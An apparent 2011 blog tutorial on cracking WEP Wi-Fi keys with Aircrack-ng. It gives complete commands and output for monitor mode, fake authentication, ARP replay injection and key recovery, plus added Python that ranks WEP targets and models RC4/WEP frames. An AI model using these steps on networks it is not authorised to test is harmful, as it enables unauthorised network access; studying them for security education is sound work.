Aircrack-ng WEP Crack Walkthrough
27 Jun 2011 (3 comments)

For those who are curious, here is a short, high-level walkthrough of the Aircrack-ng tools needed for sniffing packets and cracking WEP networks. I'll go over all the commands you need to crack the average WEP key, and give some direction for digging further into WEP-encrypted networks.

If you don't have Aircrack-ng, you will want to grab it and compile / install it for your architecture.

If you are using Ubuntu you can

sudo apt-get install aircrack-ng

which will pull it from the repos. I believe most mainline distros have the aircrack-ng binaries in their repos.

There are also several "pentesting" distros, such as BackTrack, that ship it preinstalled. I'll be doing this walkthrough with BackTrack 5 GNOME in a VirtualBox VM. Note that in a VM the wireless adapter has to be a real USB card passed through to the guest; the virtual NIC that VirtualBox emulates cannot go into monitor mode or inject frames. The Realtek RTL8187L shown below is such a USB chipset.

Installing Aircrack-ng gives you several different programs:

  • Airmon-ng puts your wireless card into monitor mode, so it receives every frame on the channel rather than only those addressed to it
  • Airodump-ng captures 802.11 frames from your card and shows them on screen, or writes them to files with the -w flag
  • Aireplay-ng injects frames: fake authentication, ARP replay and the other attacks used to make a WEP network produce traffic
  • Aircrack-ng is the program that finally recovers the key from the IVs gathered by the previous programs

The rest of the Aircrack-ng suite of programs is outside the scope of this walkthrough, but certainly worth further reading.

Here are the basic commands, and the output you should see from running them. Pay attention to the syntax, as it is important.

Airmon-ng:

root@bt:~# airmon-ng

Interface       Chipset                 Driver

wlan0           Realtek RTL8187L        rtl8187 - [phy0]

With no flags, airmon-ng lists the wireless interfaces it can see, with their chipset and driver, as you can see above. To put the available card(s) into monitor mode, run the following command:

 

root@bt:~# airmon-ng start wlan0

Interface       Chipset                 Driver

wlan0           Realtek RTL8187L        rtl8187 - [phy0]
                                        (monitor mode enabled on mon0)
mon0            Realtek RTL8187L        rtl8187 - [phy0]

As you can see, monitor mode is enabled on a new interface, mon0. This is the interface you will be using for most of the rest of the commands.

Next, run airodump-ng on the monitor interface:

airodump-ng mon0

With no channel given it hops across all channels and lists every network it hears, giving output like this:

 

CH 10 ][ Elapsed: 56 s ][ 2011-05-25 04:50

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:12:CF:A4:77:BD  -24       72      0    0  11  54e. WEP  WEP         hackmepls
00:0F:66:C5:E3:0C  -25       93      1    0   6  54e. OPN              dd-wrt
00:0F:66:E3:84:78  -56       43      1    0   1  54e. OPN              starbucks
00:C0:CA:28:35:E6  -65       24      0    0   5  11 . OPN              DIV10(2.4GH.z)
00:1B:11:13:76:EC  -72        3      0    0   9  54 . OPN              Earth Link _ALJanoub 07705710497
00:15:6D:60:CA:07  -71       10      0    0  11  54e. OPN              EarthLink@aswar(2)07705505735

BSSID              STATION            PWR  Rate    Lost  Packets  Probes

(not associated)   00:02:6F:4C:D8:C1  -59   0 - 1    58       34
00:0F:66:C5:E3:0C  0C:EE:E6:B9:C8:3C  -43   0 - 1e    0        2
00:0F:66:C5:E3:0C  00:24:2B:70:5C:DE  -51   0 - 1     0        7  USO-ALIALSALEM,TBC
00:0F:66:E3:84:78  B4:82:FE:63:8F:26  -56   0 - 1     0        1
00:0F:66:E3:84:78  00:23:15:51:FB:88  -63   0 - 1e    0        4
00:0F:66:E3:84:78  00:24:D6:26:38:48  -68   0 - 1e   36       11

This shows you quite a bit of information about surrounding networks. Let's look at the top section:

  • BSSID is the MAC address of the access point (AP).
  • PWR is the signal level in dBm at which you receive the AP; closer to 0 is stronger, so -24 is a much better signal than -72.
  • Beacons is the number of beacon frames received from the AP.
  • #Data / #/s is the number of data frames captured on that network, and the current rate per second. For WEP these are the frames that carry IVs, so this is the number to watch.
  • CH is the channel the AP uses.
  • MB is the maximum rate the AP supports; a trailing "e" means QoS (802.11e) is enabled and "." means short preamble.
  • ENC is the encryption in use: OPN (none), WEP, WPA or WPA2.
  • CIPHER is the cipher behind it, e.g. WEP, TKIP or CCMP.
  • AUTH is the authentication scheme: OPN (open system), SKA (WEP shared key), PSK (pre-shared key) or MGT (802.1X / RADIUS). It is often blank until airodump-ng has watched a client authenticate.
  • ESSID is the broadcast name of the network.

The second section deals with clients:

  • BSSID is the MAC of the AP the client is connected to, or "(not associated)" if it is not attached to any.
  • STATION is the client's MAC address.
  • PWR is the client's signal level in dBm.
  • Rate is the last seen data rate, AP-to-client - client-to-AP (the "e" again marks QoS).
  • Lost is the number of data frames lost over the last 10 seconds, judged from gaps in the sequence numbers; useful for troubleshooting aireplay-ng attacks.
  • Packets is the number of data frames seen from the client.
  • Probes is the list of ESSIDs the client is sending probe requests for (the networks it remembers), useful for Pineapple / Jasager attacks.

Now that you understand what airodump-ng prints, try:

airodump-ng --help

This lists all the usable flags for airodump-ng. Pay special attention to:

-c limits the channel, for example -c 6 to listen only on channel 6. A card can be on one channel at a time, so once you have a target you want to stop hopping.

--bssid filters by AP MAC, useful for running airodump-ng against a single AP.

-w "writes" what airodump-ng sees to a set of files with the given prefix: a .cap with the raw frames (this is what aircrack-ng needs) plus .csv, .kismet.csv and .kismet.netxml summaries of the networks and clients, which you can use to crack the encryption later and / or look back on data captured from a dump session.
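As an added example (not code from the original post), here is a small Python parser for the prefix-01.csv file that airodump-ng writes next to the .cap when you use -w. The CSV carries the same columns as the screen above, one section for APs and one for stations. The sample CSV embedded below is constructed for the example from the networks in the screenshot; the column layout is the real airodump-ng one. It picks out the WEP networks, strongest signal first, attaches each associated client to its AP, and builds the per-target capture command, which is exactly the information you need before choosing -c and --bssid.

```python
"""Parse the <prefix>-01.csv that airodump-ng -w writes and list WEP targets.

Added example, not code from the original post.  The CSV layout is the one
airodump-ng produces (two sections, comma-separated); the rows are constructed
from the networks shown in the walkthrough.
"""
from dataclasses import dataclass, field

# Constructed sample: the screenshot's APs/clients in airodump-ng's CSV layout.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:12:CF:A4:77:BD, 2011-05-25 04:49:04, 2011-05-25 04:50:00, 11, 54, WEP, WEP, , -24, 72, 0, 0.  0.  0.  0, 9, hackmepls, 
00:0F:66:C5:E3:0C, 2011-05-25 04:49:04, 2011-05-25 04:50:00,  6, 54, OPN, , , -25, 93, 1, 0.  0.  0.  0, 6, dd-wrt, 
00:0F:66:E3:84:78, 2011-05-25 04:49:05, 2011-05-25 04:50:00,  1, 54, OPN, , , -56, 43, 1, 0.  0.  0.  0, 9, starbucks, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:02:6F:4C:D8:C1, 2011-05-25 04:49:10, 2011-05-25 04:50:00, -59, 34, (not associated) , 
00:24:2B:70:5C:DE, 2011-05-25 04:49:12, 2011-05-25 04:50:00, -51,  7, 00:0F:66:C5:E3:0C,USO-ALIALSALEM,TBC
00:C0:CA:39:62:44, 2011-05-25 06:07:00, 2011-05-25 06:07:08,   0,  8, 00:12:CF:A4:77:BD, 
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str          # ENC column: OPN / WEP / WPA / WPA2
    cipher: str           # CIPHER column: WEP / TKIP / CCMP
    auth: str             # AUTH column: OPN / SKA / PSK / MGT (often blank)
    power: int            # dBm, closer to 0 is stronger
    beacons: int
    data: int             # "# IV" in the CSV, #Data on screen: the IV-bearing frames
    essid: str
    clients: list = field(default_factory=list)


@dataclass
class Station:
    mac: str
    power: int
    packets: int
    bssid: str            # "(not associated)" for clients not attached to any AP
    probes: list          # ESSIDs the client is probing for


def _sections(text):
    """Split the file into AP rows and station rows, dropping the two header lines."""
    ap_rows, sta_rows, current = [], [], None
    for line in text.splitlines():
        if line.startswith("BSSID,"):
            current = ap_rows
        elif line.startswith("Station MAC,"):
            current = sta_rows
        elif current is not None and line.strip():
            current.append(line)
    return ap_rows, sta_rows


def parse_airodump_csv(text):
    """Return ({bssid: AccessPoint}, [Station]) with each client linked to its AP."""
    ap_rows, sta_rows = _sections(text)
    aps = {}
    for row in ap_rows:
        f = [x.strip() for x in row.split(",")]
        if len(f) < 15:
            continue
        # An ESSID may itself contain commas: everything between ID-length and Key is the ESSID.
        aps[f[0]] = AccessPoint(bssid=f[0], channel=int(f[3]), privacy=f[5], cipher=f[6],
                                auth=f[7], power=int(f[8]), beacons=int(f[9]),
                                data=int(f[10]), essid=",".join(f[13:-1]).strip())
    stations = []
    for row in sta_rows:
        f = [x.strip() for x in row.split(",")]
        if len(f) < 6:
            continue
        # Probed ESSIDs are comma-separated in the last column, so they spill over field 6.
        st = Station(mac=f[0], power=int(f[3]), packets=int(f[4]), bssid=f[5],
                     probes=[p for p in f[6:] if p])
        stations.append(st)
        if st.bssid in aps:
            aps[st.bssid].clients.append(st)
    return aps, stations


def wep_targets(aps):
    """WEP networks, strongest signal first.  An attached client matters for the
    ARP replay attack: it is what produces the ARP request that gets replayed."""
    return sorted((ap for ap in aps.values() if ap.privacy == "WEP"),
                  key=lambda ap: ap.power, reverse=True)


def airodump_command(ap, prefix, iface="mon0"):
    """The per-target capture command from the walkthrough, filled in from the CSV."""
    return f"airodump-ng -c {ap.channel} --bssid {ap.bssid} -w {prefix} {iface}"


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for ap in wep_targets(aps):
        print(f"{ap.essid} {ap.bssid} ch {ap.channel} {ap.power} dBm, "
              f"{ap.data} data frames, {len(ap.clients)} client(s)")
        print("   ", airodump_command(ap, ap.essid))
```

The parser splits on plain commas rather than using the csv module because the last column of the station section is itself a comma-separated list, and an ESSID can contain commas too; both are handled by position rather than by quoting, which airodump-ng does not do.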

 

root@bt:~# airodump-ng -c 11 --bssid 00:12:CF:A4:77:BD -w hackmepls mon0

This command captures only channel 11 and only frames to or from BSSID 00:12:CF:A4:77:BD, and writes them to files named hackmepls-01.* (airodump-ng numbers each run). Note that mon0 is the last argument on this command; it tells airodump-ng which interface to run on. Locking to one channel matters: while hopping, the card spends most of its time on other channels and you would miss most of the IVs.

 

CH 11 ][ Elapsed: 11 mins ][ 2011-05-25 05:53

BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:12:CF:A4:77:BD  -27  86     6394      0    0  11  54e. WEP  WEP         hackmepls

BSSID              STATION            PWR  Rate    Lost  Packets  Probes

Note: leave this command running; it has to be capturing while the next few commands generate packets. The RXQ column, which only appears once you lock to a channel, is the percentage of the AP's frames received over the last 10 seconds; 86 is fine.

After 11 minutes there are still 0 data frames: nobody is using the network, so no IVs are being produced. This is not a huge problem, and of course there is a specialized program designed to help with just such an issue.

aireplay-ng --help

Run that command and read through the available flags; several of them will be familiar already. What we need to do is associate with the AP, so that it will accept and answer frames from our card. We don't need the WEP key for this step: with Open System authentication the AP never checks the key at authentication time, so a fake authentication succeeds without it. If the AP is configured for Shared Key authentication (SKA in the AUTH column) instead, aireplay-ng needs a captured keystream (a PRGA .xor file, see its -y option) to answer the challenge; that case is outside this walkthrough.

root@bt:~# aireplay-ng -1 5 -a 00:12:CF:A4:77:BD mon0

Where:

-1 selects the fake-authentication attack, and the 5 is the reassociation delay in seconds: aireplay-ng re-sends the authentication and association requests every 5 seconds so the AP does not drop us. -a is the AP MAC (a different flag name from airodump-ng's --bssid, which is annoying), and mon0 is again the interface. There is also -h for the source MAC to use; if the AP uses MAC address filtering, or you want to hide behind a different MAC, this is the flag you want. When -h is omitted the interface's own MAC is used.

Running this command should give the following output:

root@bt:~# aireplay-ng -1 5 -a 00:12:CF:A4:77:BD mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:39:62:44)
05:59:01  Waiting for beacon frame (BSSID: 00:12:CF:A4:77:BD) on channel 11
05:59:01  Sending Authentication Request (Open System) [ACK]
05:59:01  Authentication successful
05:59:01  Sending Association Request [ACK]
05:59:01  Association successful :-) (AID: 1)

Note the "Association successful" line; this is important, as you cannot continue until you have a successful association. Some APs get confused by lots of association requests, so you can back the delay off from 5 to 10, 15, or whatever works for you. If you see "Authentication successful" but association keeps failing, the usual causes are MAC filtering on the AP (try -h with the MAC of a client airodump-ng has already seen) or simply being too far from it.

This might be a great time to open several tabs, or terminal windows, because this command must continue to run for the rest of the attack. Also, you should still be running airodump-ng to capture the packets we are about to generate.

Go back and check your airodump-ng command, or re-run it, and you should see your station authenticated to it:

 

CH 11 ][ Elapsed: 8 s ][ 2011-05-25 06:07

BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:12:CF:A4:77:BD  -35  96       78      0    0  11  54e. WEP  WEP    OPN  hackmepls

BSSID              STATION            PWR  Rate    Lost  Packets  Probes

00:12:CF:A4:77:BD  00:C0:CA:39:62:44    0   0 - 1     8        8

Note that you are now associated with the AP and exchanging frames with it; the AUTH column reads OPN because airodump-ng watched the AP accept an Open System authentication. Next we need to generate a LOT of traffic: the attack needs on the order of tens of thousands of unique IVs (the run below used just over 50,000), and an idle WEP network produces almost none on its own.

aireplay-ng is our friend again here:

root@bt:~# aireplay-ng -3 -b 00:12:CF:A4:77:BD mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:39:62:44)
03:48:10  Waiting for beacon frame (BSSID: 00:12:CF:A4:77:BD) on channel 1
Saving ARP requests in replay_arp-0627-034810.cap
You should also start airodump-ng to capture replies.
Read 2650 packets (got 0 ARP requests and 37 ACKs), sent 0 packets...(0 pps)

-3 is the ARP request replay attack and -b is the AP MAC (yes, a third spelling of the same flag). aireplay-ng listens for an encrypted ARP request on the target network; it can recognise one without the key from the frame's fixed size and broadcast destination. Once it has one, it replays it to the AP over and over. The AP re-broadcasts each copy with a fresh IV, so the #Data counter in airodump-ng climbs at hundreds of packets per second (how many depends on the card). Check that the channel in the "Waiting for beacon frame" line matches the AP's channel (11 here); if the card is sitting on another channel aireplay-ng will never see the beacon, so restart airodump-ng with -c 11 first. With no real client attached the counter can stay at "got 0 ARP requests" for a long time; deauthenticating a client (aireplay-ng -0) so it re-ARPs on reconnect, or the fragmentation (-5) and chopchop (-4) attacks that forge an ARP request, are the next things to read about. Give yourself a few minutes to build up a good number of IVs.

root@bt:~# aircrack-ng hackmepls-01.cap

This runs aircrack-ng against hackmepls-01.cap, the capture file that airodump-ng -w hackmepls wrote. aircrack-ng reads every IV in the file and runs its statistical attack on them; if there are too few it fails and retries on its own as the file grows, so you can leave it running alongside airodump-ng and aireplay-ng. Adding -b 00:12:CF:A4:77:BD restricts it to the one BSSID if the capture holds several networks.

 

Aircrack-ng 1.1 r1899

[00:00:18] Tested 3926 keys (got 51776 IVs)

KB  depth    byte(vote)
 0   0/  4   22(69632) 93(61184) 7B(60416) E1(60416) 4C(60160) 19(59904) 55(59648) 62(59392) CE(59392) 78(58624) 9C(58112) A2(58112)
 1   0/  1   88(77824) B9(63488) 9E(61184) 28(60928) 4D(60928) 5C(60416) EE(60416) 69(60160) 3D(59904) 52(59904) FF(59904) EC(58624)
 2   0/  1   88(72960) 1C(61696) 61(60160) 1E(59904) 38(59648) 4A(59392) 68(59136) 52(58880) 8A(58112) DD(58112) C4(57856) F6(57856)
 3   0/  9   88(67584) 6A(61440) A1(61440) 6E(60928) CF(59904) 1F(59648) 25(58624) FB(58368) FC(58368) 1B(58112) 08(57856) 6D(57856)
 4 103/110   D0(52736) 08(52480) 36(52480) 4C(52480) 66(52480) D6(52480) DC(52480) F8(52480) 6D(52224) 93(52224) D7(52224) F2(52224)

KEY FOUND! [ 69:6e:73:65:63:75:72:65:77:65:70:30:31 ]

Decrypted correctly: 100%

Note that the key is printed as hex bytes: 69:6e:73:... is simply the byte values of the ASCII key "insecurewep01" (0x69 is 'i', 0x6e is 'n', and so on). The IVs do not carry the key in any form; the key is never transmitted. aircrack-ng recovers it a byte at a time (the KB rows above) from statistical biases in the RC4 keystreams that the captured IVs expose, which is why it wants so many of them, and it prints raw bytes because a WEP key need not be printable ASCII at all. "Decrypted correctly: 100%" means every captured data frame decrypts to a valid ICV (CRC-32) under the recovered key.
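Two things the tools above do without ever holding the key are worth seeing in code: how aireplay-ng -3 spots an ARP request inside encrypted frames, and how aircrack-ng decides that a candidate key is right ("Decrypted correctly: 100%"). The Python below is an added example, not code from the post or from the Aircrack-ng project. It implements RC4 and the WEP encapsulation (IV || key as the RC4 key, CRC-32 ICV), builds a few ARP-request frames under the post's key "insecurewep01" with the MACs from the post (the frames, IVs and IP addresses are constructed for the example), applies the same size-and-direction test aireplay-ng uses to select ARP requests, and verifies a key the way aircrack-ng does, by decrypting each frame and checking its ICV. It also decodes the hex aircrack-ng prints back to the ASCII key.

```python
"""RC4 / WEP encapsulation, the ARP-request size test, and key verification by ICV.

Added example, not code from the post or from Aircrack-ng.  Frames, IVs and IP
addresses are constructed for the example; the MACs and the key are the ones
from the walkthrough.
"""
import struct
import zlib

BSSID = bytes.fromhex("0012CFA477BD")     # the AP from the post
STATION = bytes.fromhex("00C0CA396244")   # the injecting card's MAC from the post
BROADCAST = b"\xff" * 6
KEY = b"insecurewep01"                    # the 104-bit key the post recovers


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of the given length (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: IV(3) || key index(1) || RC4(IV||key)(plaintext || CRC-32 ICV).
    The 24-bit IV is sent in the clear; it is what airodump-ng counts as #Data."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + b"\x00" + _xor(plaintext + icv, rc4(iv + key, len(plaintext) + 4))


def wep_decrypt(key: bytes, body: bytes):
    """Decrypt a WEP body; return the plaintext if the ICV checks, else None."""
    iv, ciphertext = body[:3], body[4:]
    pt = _xor(ciphertext, rc4(iv + key, len(ciphertext)))
    data, icv = pt[:-4], pt[-4:]
    return data if struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) == icv else None


def build_arp_request_frame(key: bytes, iv: bytes, sender_ip=b"\xc0\xa8\x01\x02",
                            target_ip=b"\xc0\xa8\x01\x01") -> bytes:
    """802.11 data frame with ToDS=1 and Protected=1 (addr1=BSSID, addr2=station,
    addr3=broadcast) carrying LLC/SNAP + a 28-byte ARP request: 24 + 4 + 36 + 4 = 68 bytes."""
    header = b"\x08\x41" + b"\x00\x00" + BSSID + STATION + BROADCAST + b"\x00\x00"
    llc_snap = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"
    arp = (b"\x00\x01\x08\x00\x06\x04\x00\x01"          # Ethernet / IPv4, opcode request
           + STATION + sender_ip + b"\x00" * 6 + target_ip)
    return header + wep_encrypt(key, iv, llc_snap + arp)


def looks_like_arp_request(frame: bytes) -> bool:
    """aireplay-ng -3 cannot read the payload, so it picks frames by shape: a protected
    data frame towards the AP (ToDS only), addressed to broadcast, exactly 68 bytes."""
    if len(frame) != 68:
        return False
    is_data = (frame[0] & 0x0C) == 0x08
    to_ds_only = (frame[1] & 0x03) == 0x01
    protected = bool(frame[1] & 0x40)
    return is_data and to_ds_only and protected and frame[16:22] == BROADCAST


def percent_decrypted(key: bytes, frames) -> int:
    """What aircrack-ng's 'Decrypted correctly: N%' reports for a candidate key."""
    ok = sum(1 for f in frames if wep_decrypt(key, f[24:]) is not None)
    return 100 * ok // len(frames) if frames else 0


def key_from_aircrack_hex(text: str) -> bytes:
    """'69:6e:73:...' is just the key bytes; decoding them gives the ASCII key."""
    return bytes.fromhex(text.replace(":", ""))


if __name__ == "__main__":
    frames = [build_arp_request_frame(KEY, bytes([n, 0x10, 0x20])) for n in range(8)]
    print("ARP requests found:", sum(looks_like_arp_request(f) for f in frames))
    print("right key decrypts:", percent_decrypted(KEY, frames), "%")
    print("wrong key decrypts:", percent_decrypted(b"insecurewep02", frames), "%")
    print(key_from_aircrack_hex("69:6e:73:65:63:75:72:65:77:65:70:30:31"))
```

The ICV check is also why a wrong candidate scores 0%: CRC-32 is not a cryptographic MAC, but under the wrong keystream the decrypted bytes are effectively random and the stored checksum will not match. The IV reuse that aircrack-ng exploits is visible in wep_encrypt too: the same IV under the same key produces the same keystream, so two such frames XOR to the XOR of their plaintexts.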

I hope this writeup helps you to understand WEP encryption better, and remember - use this knowledge for good, not bad!

--badger32d

  • Danny

    hi there.

I am new to BackTrack 5, but I am able to get through all of this process; the one thing that is killing me is the fact that I can’t get enough IVs to continue the attack.
Is there any command that I can add to this tutorial's commands to get an increase in IVs captu

    • Ana

      # aireplay-ng -3 -b 00:12:CF:A4:77:BD mon0 <- This one is for injecting which increases the ivs. It works (couple of seconds to a minute max, depending on your card). Unless the fake auth failed, in which case it won't work.

  • Bilbo

Sometimes it is difficult to manage airodump-ng output files. I mean, once I generate those csv and xml files and start looking into them, for large amounts of data I can’t figure them out. So are there any tools or services available for analysis and visualization? I have used this website and it is quite

    good; here I have shared my sample data, have a look, and also share any other sources if anyone knows of them. – http://bit.ly/1Nbfgm6